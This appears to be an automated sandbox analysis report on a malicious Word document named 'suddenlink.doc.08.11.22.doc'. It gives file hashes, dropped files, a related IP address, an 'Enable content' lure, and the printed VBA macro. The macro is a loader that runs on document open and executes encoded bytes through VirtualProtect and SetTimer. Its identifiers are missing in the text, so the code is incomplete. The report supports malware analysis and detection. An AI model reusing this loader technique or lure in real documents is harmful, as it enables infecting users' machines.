	b2btechnical.doc.08.11.2022.doc	Get hash	malicious	Browse	45.8.146.139
	suddenlinkfile08.11.2022.doc	Get hash	malicious	Browse	45.8.146.139
	b2btechnical.doc.08.11.2022.doc	Get hash	malicious	Browse	45.8.146.139
	attorneycop.file.08.11.doc	Get hash	malicious	Browse	45.8.146.139
	b2btechnical.doc.08.11.2022.doc	Get hash	malicious	Browse	45.8.146.139
	suddenlinkdocument08.11.22.doc	Get hash	malicious	Browse	45.8.146.139
	attorneycop.file.08.11.doc	Get hash	malicious	Browse	45.8.146.139
	bergo.document.08.11.2022.doc	Get hash	malicious	Browse	45.8.146.139
	attorneycop.file.08.11.doc	Get hash	malicious	Browse	45.8.146.139
	suddenlinkdocument08.11.22.doc	Get hash	malicious	Browse	45.8.146.139
	bergo.document.08.11.2022.doc	Get hash	malicious	Browse	45.8.146.139
	suddenlinkdocument08.11.22.doc	Get hash	malicious	Browse	45.8.146.139
	bergo.document.08.11.2022.doc	Get hash	malicious	Browse	45.8.146.139

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EAD25F63.png

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	PNG image data, 440 x 440, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	256025
Entropy (8bit):	7.98021203163416
Encrypted:	false
SSDEEP:	6144:x+Js5bWmwngQ8+C5K7jGQvBxyLuv/YQ2M2xkUfpaj:xcstWmIrC54qGxyKozMW/pq
MD5:	A510821080102B59B41A4B4F7517A2E9
SHA1:	0DE77D02B1EC5854FB491938966A1F21A45B6342
SHA-256:	C00890A5BD755B16A7EDD3639B0499D2DF25D47C1B7869D66DCFDCF4C1128655
SHA-512:	5A993B2FAF68F531EA18473952ECE1E208668789D4652647A8D8B1DD98CB219F6A367AF746FAB3AB73E16DB5AC85EAD3FAB2F24B3408B103445DC47C3886F76A
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR.............7......sRGB.........gAMA......a.....pHYs..!...!..........IDATx^....fWU.3#m.C......G..$.H$(.B..Q@R.3.@T..!!..2.......J.@...$Dh.j....L........1u...}..U;.<....>.k...k........k..K\C..=1F..>C....2...aL>.&..!...P.}!.4...k.V.H...LM'.\..,......<..dH........kG..C..2..J#$2.r.c.I....z.h...d[^...0k.3n....5...Yc...y..AO.H.../......z+."uW.......i..Z~"...[...zj.j.Z(.u.Z.WQ.*?..W...k........E..k....#..Z^b..T~..6M......O....t.^C../.5ni..+w.h.I...5....4....h.GB.\|^..'].5T....lE...L{..^....d..d..[.^..g.5_i=T..L.1.....\|.@MW@o.A+..4....f.-=Q.K...a..........r....E[~V.m.d..Ue2nQef...+..1...7A..k.h.=~.J.eA.+..'.\..Vn...=]....m.X..C+.\.Y<Pym...1.P...2I'T.SCE.-...A....^....\|;....JT.5.Z^.U..yP....t.z....{r....LW~"iU...4h. iI...f.. dG..)W.g..r-..=.^iI..k.+...6..g..k.H..\.Z..y..[..L....C.k...o.5..h.......Np...P..d.....iO.\|..v.A.......X....t..zr5..K.U.\.^..{@...#.?&..m..o.u\|.c.5_.....\|...W..A.+..V........m...z<@:....Z..,.q.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F5B4A08.png

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	PNG image data, 380 x 526, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	79862
Entropy (8bit):	7.9850226558494
Encrypted:	false
SSDEEP:	1536:3oqyPqib6IbiXmcfDBFdEU8yslk2ZGBlGUCk4+:3yqtImXmcbBFopLwlGDkH
MD5:	F673388F14A0B0E6160D7E31FB8B27A7
SHA1:	792480CA5B43D57E2A0A65466D77A294DA9D55C3
SHA-256:	0D79507FBC5D3C1843F0584E92FFD8B8F2862B4AE569BEB934963B30185E6489
SHA-512:	957C95FE8ED7DC213F027C59952F3F2AB5DFE6ED91944880D230AFC7B2B9EFFD812000FBF26CD6948DD3C478CB9B049C97405F6EBD4A86E3D10241DA3A0B692A
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.PNG........IHDR...\|.........4.!... .IDATx...{#...9g...p...l.+....^x..[..'.....9...g.K.t7.0#...Ca....S..[o.:.N:.v.'......r...W...q.....!......q.CF.g..._.c.y........,.;9....6.._z...,./.....nt.../..g.t..._......._./.-......F......+mt.X.../...+...0:......./.^.{...b.}.`0.X,....V..\|.8N0.$..\...@0....l.ZqB.+?_...fR}....%.\.....Y,.\|A..r..Z..B~8..t.P.~.Cc[p.D.W.INn...f....5....c.If.V....Oh$Y...\|....GI......q... .....u..../....b.`.0.L.@ 0.L..@(.......Ac..Rd...o............6~x..v..t.._...Ph6.E"...... .T..\_,..p..e.1.o......qf.uk/.km/w.Z..<...9.'.\|>..B.PH.....K.J.8...$.;.\|>g...A..3\..'._e....pX6x..(..m....Kc6...a.By;.P..R..M.u..p2.\|....7..0V.kO..n...v#..\|>.....pm.....B..$..-..h4:.N#..r..D"\|n<...ak..`0.k.g....d@q..Cf<wk..oW.....5.....V.U.+$....?.2..r..6...}:=.e.j.I.)/........Y..t:.L.......vG.H...t.j....:..`0..FL.H$....d.P(..DB...j%.....g.Y..<??o.Z...t.....l.P(.r.X,&k..._.Fm>..Z....^.7...)...8.X.X,...t:..Dd-.{%......y.8.x<...h6..H$.H.\..`;[..O....(.....B

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{7363718C-0FC5-4461-9EF0-562FC1188CC7}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	3.999784251111637
Encrypted:	false
SSDEEP:	384:Ttn3ifjji2GzIFHF9OJW6+vpgt6Jifjji2GzIFHF9OJW6+vp:B3ifjH9RXOJW6+NJifjH9RXOJW6+
MD5:	C206E343BEA0B63007069B1FB32D81AB
SHA1:	E6946946D67B52DAF5F425E0EDCE472E735BAE7D
SHA-256:	B99281C9E9B04DCDF9ED683047212352C65D75DE91F9DECFFBE18CB73F29501A
SHA-512:	1F31245CB241083030F5D2D99197E3F6E5DD46B028B378FCAF68A527BEEECFB7E1A0945607BBD70477274742024213F131E1C816483598D49DC865545E84C408
Malicious:	false
Reputation:	low
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................(.......................................................................................................4...)...............................................*...+...,...-......./...0...1...2...3...5...6.......................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{7BA60EB8-B1D5-4B9A-84DE-67BC33ED9511}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1536
Entropy (8bit):	2.1363686128594344
Encrypted:	false
SSDEEP:	12:DMlzfRLZRW4WZ1MFKuQ9cc3xn82lshakwkvu4i454PllYHkUZR+/W4c:4LG1ND9Pxn82Shak4fCY+H/rz
MD5:	74E435B7E86AE8D08CA309653AC019E8
SHA1:	1D3153EDA5F56D7CD7EB4425BD484D4A8F3FB1BC
SHA-256:	ADBA871414A54C8C7B84F54CCBE7CAD9BA87CECB3BEF81C21CA4C780A8B73F31
SHA-512:	F72B908A7533B2EC9A2CFB5036F1BF44DA2C3509BFD9F0EDA0C3ACEF711C045AC10163F8605BBF928891E9F2B80068FD125DA5C0A828351C2F6F7A000BB66139
Malicious:	false
Reputation:	low
Preview:	.././...T.h.i.s. .d.o.c.u.m.e.n.t. .c.r.e.a.t.e.d. .i.n. .p.r.e.v.i.o.u.s. .v.e.r.s.i.o.n. .o.f. .M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .W.o.r.d.....T.o. .v.i.e.w. .o.r. .e.d.i.t. .t.h.i.s. .d.o.c.u.m.e.n.t.,. .p.l.e.a.s.e. .c.l.i.c.k. .. E.n.a.b.l.e. .e.d.i.t.i.n.g.. .b.u.t.t.o.n. .o.n. .t.h.e. .t.o.p. .b.a.r.,. .a.n.d. .t.h.e.n. .c.l.i.c.k. .. E.n.a.b.l.e. .c.o.n.t.e.n.t.. ..........................................................................................................................................................z.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E9ED2FB3-553A-41AD-8A8D-A96BE0FFFE15}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Reputation:	high, very likely benign file
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF6C958FC245A84978.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	59904
Entropy (8bit):	4.1693457531622515
Encrypted:	false
SSDEEP:	1536:5b0jT8Y3AydcuhUp/9tb+0GQmu/jyqwGfay:5IjT8Sh+uhUpL+0GQnjyqwGfa
MD5:	14CE81686968E89163389606B3C0A09C
SHA1:	86DF1DF5DE9327AFCC422F1B2277E93E28F5C3C8
SHA-256:	2E29C4E30155421DDCBC9E76AF4706F9E48E0CA28006614C16FA63FC4508F600
SHA-512:	3CA8FF84F26779C123E569DF3F5C30C6B57712E486F7FC2C2D698E9D43E9A9EED1FA884515A9F4593C821A42518E8F9A53B193243C570A33BB4A756BF56ABB48
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	......................>...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................S...........(........................................................................................................... ...!..."...#...$...%...&...'.......)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9.......;...<...=...>...?...H...A...B...C...D...E...F...G...:...I...J...K...L...M...N...O...P...Q...R......._...U...V...W...X...Y...\...[.......h...^...........a...b...c...d...e...f...g...Z...i...j...s...l...m...n...o...p...q...r...]...............................

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	97
Entropy (8bit):	4.617781427614191
Encrypted:	false
SSDEEP:	3:bDuMJlOUBA9ML0dRjbUmX1Xw9ML0dRjbUv:bC6oK0dlbCK0dlb2
MD5:	135F37C6E324A5EBBB0F7836C0183C93
SHA1:	72FC8344F3415FCB1D989CCB08EBD69706883E79
SHA-256:	DE33429FABCDA46B35EED5271B897FF22DCD3E666FBFC203052B0DD094EC8449
SHA-512:	81E0519BA192D1BB2BCE5ABEDE7CFEC424886051CB0F2E0ED994027DC58644AFAC8DA33E284FC283E2A3E9E81048FC9B182ED86FFF15B13C38E98209477E9691
Malicious:	false
Preview:	[folders]..Templates.LNK=0..suddenlink.doc.08.11.22.LNK=0..[doc]..suddenlink.doc.08.11.22.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\suddenlink.doc.08.11.22.LNK

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:45:53 2022, mtime=Tue Mar 8 15:45:53 2022, atime=Fri Aug 12 03:52:11 2022, length=2315700, window=hide
Category:	dropped
Size (bytes):	1079
Entropy (8bit):	4.522535011856129
Encrypted:	false
SSDEEP:	12:84JtlsU0gXg/XAlCPCHaXRBktB/eLX+Wo6ME/xgign4Cicvbjv0dldannqDtZ3YY:84Jhk/XThOMSE/xflJeEdl1Dv3qdu7D
MD5:	D79C8BB1F679A301E9F1D9CC0053B74A
SHA1:	652F887B3911875C5FAA2EA0C2A7A01ADD151F40
SHA-256:	B103755BE7DC908887654BEF1F0922A5A284DB692067E89D16534D9CEA1AB29A
SHA-512:	EE895E685883D11E6932F66FB9E327674AA0CE90496390F018CBC1F195A3392A777B96E06EC16D5CFFCA9CD2A289BD3AB56A94BD74A188AECE34A83A38DB7CB1
Malicious:	false
Preview:	L..................F.... ...I....3..I....3..u,qH.....U#..........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....hT....user.8......QK.XhT.....&=....U...............A.l.b.u.s.....z.1.....hT....Desktop.d......QK.XhT....._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2..U#..U.& .SUDDEN~1.DOC..d......hT..hT.....r.....'...............s.u.d.d.e.n.l.i.n.k...d.o.c...0.8...1.1...2.2...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\367706\Users.user\Desktop\suddenlink.doc.08.11.22.doc.2.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.s.u.d.d.e.n.l.i.n.k...d.o.c...0.8...1.1...2.2...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......36770

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.503835550707525
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyaJybdJylp2bG/WWNJbilFGUld/ln:vdsCkWtz8Oz2q/rViXdH/l
MD5:	7CFA404FD881AF8DF49EA584FE153C61
SHA1:	32D9BF92626B77999E5E44780BF24130F3D23D66
SHA-256:	248DB6BD8C5CD3542A5C0AE228D3ACD6D8A7FA0C0C62ABC3E178E57267F6CCD7
SHA-512:	F7CEC1177D4FF3F84F6F2A2A702E96713322AA56C628B49F728CD608E880255DA3EF412DE15BB58DF66D65560C03E68BA2A0DD6FDFA533BC9E428B0637562AEA
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p........1h..............2h.............@3h..............3h.....z.......p4h.....x...

C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Little-endian UTF-16 Unicode text, with no line terminators
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:Qn:Qn
MD5:	F3B25701FE362EC84616A93A45CE9998
SHA1:	D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256:	B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512:	98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious:	false
Preview:	..

C:\Users\user\Desktop\~$ddenlink.doc.08.11.22.doc

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.503835550707525
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyaJybdJylp2bG/WWNJbilFGUld/ln:vdsCkWtz8Oz2q/rViXdH/l
MD5:	7CFA404FD881AF8DF49EA584FE153C61
SHA1:	32D9BF92626B77999E5E44780BF24130F3D23D66
SHA-256:	248DB6BD8C5CD3542A5C0AE228D3ACD6D8A7FA0C0C62ABC3E178E57267F6CCD7
SHA-512:	F7CEC1177D4FF3F84F6F2A2A702E96713322AA56C628B49F728CD608E880255DA3EF412DE15BB58DF66D65560C03E68BA2A0DD6FDFA533BC9E428B0637562AEA
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p........1h..............2h.............@3h..............3h.....z.......p4h.....x...

Static File Info

General

File type:	Zip archive data, at least v2.0 to extract
Entropy (8bit):	7.993530464050495
TrID:	Word Microsoft Office Open XML Format document (49504/1) 49.01% Word Microsoft Office Open XML Format document (43504/1) 43.07% ZIP compressed archive (8000/1) 7.92%
File name:	suddenlink.doc.08.11.22.doc
File size:	2315700
MD5:	13f0a9bd5a2a4fd90924a953eb9b1642
SHA1:	bb6d3ab2c01d3058964cd6493a691ad9971307ca
SHA256:	04042893124fdbf007cfdb673ef878ac9a47f37f871c1e5322ec46945915abc1
SHA512:	4a5d5d80a802886231ff33a37f2bb5e319aee424fe965e69638e77491680543885514bd314e633e2be51475b5585705b0ed1d111bc4dd612d94e82f7a725fc9b
SSDEEP:	49152:T/6jUrhhEP6jf4bkgrMk3tuXBJzExnppCcssLxoO:TyjTijf8IFxJzqppCEoO
TLSH:	49B533C47306AF5D811748F0201FBF87EA705485A71B935929ABF68DCEF260DB2C794A
File Content Preview:	PK..........!..U~............._rels/.rels...J.@............4.E..D.....$....T..w-..j........\|.zs..z..z.X.%(v......6O.{PI........`S__._x .C..CR....:....t..R......hI.3..H.Q...;..=..y... n.......yo.......[vrf..A..6..3[.>_...-K....\NH!....<..r...E.B..P...<_.

File Icon


Icon Hash:	e4eea2aaa4b4b4a4

Static OLE Info

General

Document Type:	OpenXML
Number of OLE Files:	1

OLE File "/opt/package/joesandbox/database/analysis/682722/sample/suddenlink.doc.08.11.22.doc"

Indicators

Has Summary Info:
Application Name:
Encrypted Document:	False
Contains Word Document Stream:	True
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:	False
Flash Objects Count:	0
Contains VBA Macros:	True

Streams with VBA

VBA File Name: ThisDocument.cls, Stream Size: 2764

General
Stream Path:	VBA/ThisDocument
VBA File Name:	ThisDocument.cls
Stream Size:	2764
Data ASCII:	. . A t t r i b u t . e V B _ N a m . e = " T h i . s D o c u m e n . t " . . . B a s . . 1 N o r m a l . . . V G l o b a l ! . S p a c . l F a . l s e . J C r e a . t a b l . . P r e d e c l a . . I d . . # T r u . " E x p . o s e . . T e m p . l a t e D e r i . v . $ C u s t o m l i z C . P . . . . . D . ? P t r S a . f e F u n c t i o n . . . . . L i b " . u s e r 3 2 " . A l i a s " K . i l l T i m e r . " ( B y V a l . . A s L o n g . ' , . . . # . & . . . . ) . # P "
Data Raw:	01 bf b4 00 41 74 74 72 69 62 75 74 00 65 20 56 42 5f 4e 61 6d 00 65 20 3d 20 22 54 68 69 00 73 44 6f 63 75 6d 65 6e 10 74 22 0d 0a 0a 8c 42 61 73 01 02 8c 31 4e 6f 72 6d 61 6c 02 2e 19 56 47 6c 6f 62 61 6c 21 01 aa 53 70 61 63 01 6c 46 61 08 6c 73 65 0c 4a 43 72 65 61 10 74 61 62 6c 15 1f 50 72 65 20 64 65 63 6c 61 00 06 49 64 11 00 23 54 72 75 0d 22 45 78 70 08 6f 73 65 14 1c 54

VBA Code

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Declare PtrSafe Function  Lib "user32" Alias "KillTimer" (ByVal  As LongPtr, ByVal  As LongPtr) As LongPtr
Private Declare PtrSafe Function  Lib "user32" Alias "SetTimer" (ByVal  As LongPtr, ByVal  As LongPtr, ByVal  As LongPtr, ByVal  As LongPtr) As LongPtr
Private Declare PtrSafe Function  Lib "kernel32" Alias "VirtualProtect" (ByVal  As LongPtr, ByVal  As LongPtr, ByVal  As LongPtr,  As LongPtr) As LongPtr
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
Public Function OSxlmNJ3q(strInput)
        OSxlmNJ3q = StrReverse(ActiveDocument.CustomDocumentProperties(strInput))
    End Function
Function (Optional  = False)
    If  Then
        Set  = ActiveDocument
    Else
        Set  = (())
    End If
    Set  = 
    End Function
Function ()
     = 9
    End Function
Function (, Optional  = False)
    If  Then
         = CDec()
    Else
         = ((), )
    End If
     = 
    End Function
Sub (w)
    Dim  As Long
    Dim  As Long
     = () + ()
    Do
         = ()
        DoEvents
    Loop Until  > 
End Sub
Function ()
    ReDim (() - 1) As Byte
    Dim  As Long,  As Long
    Dim :  = OSxlmNJ3q("zIhrMmjLtXQW") & OSxlmNJ3q("kmhHfEK0BmbD")
    For  = 0 To () - 1 Step 2
         =  / 2
        () = 255 - ( & (, ) & (,  + 1))
    Next
     = 
End Function
Function ()
     = 1
    End Function
Function ()
     = 5
    End Function
Function (, , Optional  = False)
    If  Then
         = Mid(,  + 1, 1)
    Else
         = ((), , )
    End If
     = 
    End Function
Function (, Optional  = False)
    If  Then
         = Len()
    Else
         = ((), )
    End If
     = 
    End Function
Function (, Optional  = False)
    If  Then
        Set  = CallByName((), OSxlmNJ3q("mwRAMK1OR"), VbGet, )
    Else
        Set  = ((), )
    End If
    Set  = 
    End Function
Function ()
     = 4
    End Function
Function ()
     = 0
    End Function
Private Sub Document_Open()
    Dim () As Byte
    If () Then
         = ((OSxlmNJ3q("NvBhF9ZYdkK")).Value)
    Else
         = ((OSxlmNJ3q("uBXX121R")).Value)
    End If
    Dim  As LongPtr
    Dim  As LongPtr
    Dim  As LongPtr
    Dim  As LongPtr
     = () + 1
     = VarPtr((0))
     , , 64, VarPtr()
            ()(OSxlmNJ3q("iR6l44Zd")) = OSxlmNJ3q("wzu8Bai2")
         = (0, , 1, )
     1
     0, 
    ().Remove (OSxlmNJ3q("G7GHEHuJN"))
    ().Remove (OSxlmNJ3q("qCORugYd45"))
    ReDim (1)
End Sub
Function (Optional  = False)
    If  Then
        Set  = CallByName((OSxlmNJ3q("AcuNyImcre")), OSxlmNJ3q("WHT_CMO"), VbGet, OSxlmNJ3q("GGHh4jSO_"))
    Else
        Set  = (())
    End If
    Set  = 
    End Function
Function (, Optional  = False)
    If  Then
         = UBound()
    Else
         = ((), )
    End If
     = 
    End Function
Function (, Optional  = False)
    If  Then
         = VarPtr()
    Else
         = ((), )
    End If
     = 
    End Function
Function (, )
     = Mid(,  + 1, 1)
End Function
Function ()
    #If Win64 Then
         = True
    #Else
         = False
    #End If
End Function
Function ()
     = 3
    End Function
Function (, Optional  = False)
    If  Then
        Set  = CallByName((), OSxlmNJ3q("BdCiDEvWAY"), VbGet, )
    Else
        Set  = ((), )
    End If
    Set  = 
    End Function
Function ()
     = 10
    End Function
Function (Optional  = False)
    If  Then
         = Timer()
    Else
         = (())
    End If
     = 
    End Function
Function (, Optional  = False)
    If  Then
        Set  = GetObject()
    Else
        Set  = ((), )
    End If
    Set  = 
    End Function
Function ()
     = 11
    End Function
Function ()
     = 6
    End Function
Function (, Optional  = False)
    If  Then
         = ()
    Else
         = ((), )
    End If
     = 
    End Function
Function ()
     = 7
    End Function
Function ()
     = 8
    End Function
Function (, Optional  = Empty, Optional  = Empty, Optional  = Empty)
    Select Case 
            Case ()
                Set  = (, True)
            Case ()
                Set  = (, True)
            Case ()
                Set  = (True)
            Case ()
                Set  = (True)
            Case ()
                Set  = (, True)
            Case ()
                 = (, True)
            Case ()
                 = (, True)
            Case ()
                 = (, True)
            Case ()
                 = (, True)
            Case ()
                 = (, , True)
            Case ()
                 = (True)
            Case ()
                 = (, True)
        End Select
End Function
Function ()
     = 2
    End Function

Streams

Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 357

General
Stream Path:	PROJECT
File Type:	ASCII text, with CRLF line terminators
Stream Size:	357
Entropy:	5.311948833105888
Base64 Encoded:	True
Data ASCII:	I D = " { A B 2 E 8 1 4 C - A 2 D F - 4 4 3 8 - 9 9 9 3 - 4 F 2 7 6 A 3 4 4 A E 0 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 3 8 3 A E 7 1 D E B 1 D E B 1 D E B 1 D E B " . . D P B = " 7 0 7 2 A F 5 0 B 0 5 0 B 0 5 0 " . . G C = " A 8 A A 7 7 8 8 7 8 8 8 7 8 7 7 " . . . . [ H o s t E x t e n d e r I n f o ] . . & H 0 0 0 0 0 0
Data Raw:	49 44 3d 22 7b 41 42 32 45 38 31 34 43 2d 41 32 44 46 2d 34 34 33 38 2d 39 39 39 33 2d 34 46 32 37 36 41 33 34 34 41 45 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22 30 22 0d 0a 56 65 72 73 69 6f 6e 43 6f 6d 70 61 74 69

Stream Path: PROJECTwm, File Type: data, Stream Size: 41

General
Stream Path:	PROJECTwm
File Type:	data
Stream Size:	41
Entropy:	3.0773844850752607
Base64 Encoded:	False
Data ASCII:	T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . . .
Data Raw:	54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 00 00

Stream Path: VBA/_VBA_PROJECT, File Type: ISO-8859 text, with no line terminators, Stream Size: 7

General
Stream Path:	VBA/_VBA_PROJECT
File Type:	ISO-8859 text, with no line terminators
Stream Size:	7
Entropy:	1.8423709931771088
Base64 Encoded:	False
Data ASCII:	a . . .
Data Raw:	cc 61 ff ff 00 00 00

Stream Path: VBA/__SRP_2, File Type: data, Stream Size: 5108

General
Stream Path:	VBA/__SRP_2
File Type:	data
Stream Size:	5108
Entropy:	1.9253220393231318
Base64 Encoded:	False
Data ASCII:	r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . . . . . . . . . . . " . . . . . . . . . . . . . . . q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` ) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	72 55 40 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 50 00 00 00 00 00 00 00 00 00 00 00 22 00 1f 00 00 00 00 00 01 00 01 00 00 00 01 00 71 07 00 00 00 00 00 00 00 00 00 00 a1 07 00 00 00 00 00 00 00 00 00 00 d1 07

Stream Path: VBA/__SRP_3, File Type: data, Stream Size: 2724

General
Stream Path:	VBA/__SRP_3
File Type:	data
Stream Size:	2724
Entropy:	2.6961948881008246
Base64 Encoded:	False
Data ASCII:	r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . P . . . . . . . . . . . . . . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` . ! . . . . . . . . . . . , . . p . . . . . . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` . a . . . . . . . . . . . X . . p . . . . . . a . . . . . . . . . . . . . . . . . . .
Data Raw:	72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 78 00 00 00 08 00 50 00 b1 08 00 00 00 00 00 00 00 00 00 00 00 00 04 70 08 00 fe ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00

Stream Path: VBA/dir, File Type: data, Stream Size: 485

General
Stream Path:	VBA/dir
File Type:	data
Stream Size:	485
Entropy:	6.299718761930016
Base64 Encoded:	True
